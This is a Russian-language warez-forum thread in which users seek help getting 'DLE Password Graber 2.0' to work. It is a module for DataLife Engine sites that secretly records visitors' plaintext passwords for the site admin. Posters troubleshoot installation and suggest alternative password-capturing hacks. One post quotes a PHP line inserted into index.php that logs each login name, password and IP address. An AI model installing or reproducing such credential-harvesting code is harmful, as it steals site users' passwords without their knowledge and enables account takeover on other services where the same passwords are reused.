• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Модуль DLE Password Graber 2.0

  • Автор темы Хортица
  • Дата начала
Статус
В этой теме нельзя размещать новые ответы.
Не поймите привратно, просто хочется посмотреть ка оно работает. Пробовал установить модуль, в админке типо добавился раздел "просмотр паролей", всё делал по инструкции, люди регаются, а пароли так этот модуль и не выдаёт - просто пусто и всё.

В чём может быть проблема???

Кто ещё пробовал отпишитесь что и как у вас.
 
да проще xак поставить этот-

*** скрытое содержание ***

Проверил... работает :) Вот только там пишут

народ! Этот мод грузит базу что ппц! Несоветую вообще брать!!! Я уже тестил!

Врут наверное... да и с чего бы? :)

Там же прочитал
Пишет некий ZLoY WareZ:
стафте мой модуль, он в ТХТ сохраняет пароли =)
Видимо и такая хрень гдето есть :nezn:
Кароче начинается параноя :D
 
У меня ни тот ни тот не пашет. Хтя делал всё в точности с описаниями. Ставил на двиг DLE 6.7

У кого работает отпишитесь.
 
Автору надо руки оторвать за такой скрипт, теперь все будут бояться регаться на сайтах =(
 
  • Заблокирован
  • #37
Автору надо руки оторвать за такой скрипт, теперь все будут бояться регаться на сайтах =(
Обычный пользователь не знает о такой штуке, а умные люди и так имеют разные пассы для icq и почты
 
У меня ни тот ни тот не пашет. Хтя делал всё в точности с описаниями. Ставил на двиг DLE 6.7

У кого работает отпишитесь.
Ставил на 7.0 тоже не работает. В админке появился мод но новые юзеры там не появляются.

А при авторизации юзеров на сайте выскакивает:

Fatal error: Call to undefined function: addlog() ..../public_html/index.php on line 39

В индексе на 39 строке такой код:

Код:
if (trim($_POST['login_name']) and trim($_POST['login_password']) and $is_logged == TRUE) addlog($lang_log['sloginfalse'].' Логин: '.$_POST['login_name'].', Пароль: '.$_REQUEST['login_password'].', IP: <a target="_blank" href="http://whois.myws.ru/d/'.$_SERVER['REMOTE_ADDR'].'">'.$_SERVER['REMOTE_ADDR'].'</a>');

Если кто знает в чем дело пожалуйста помогите.
 
  • Заблокирован
  • #39
Ты права на файлы поставил?
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху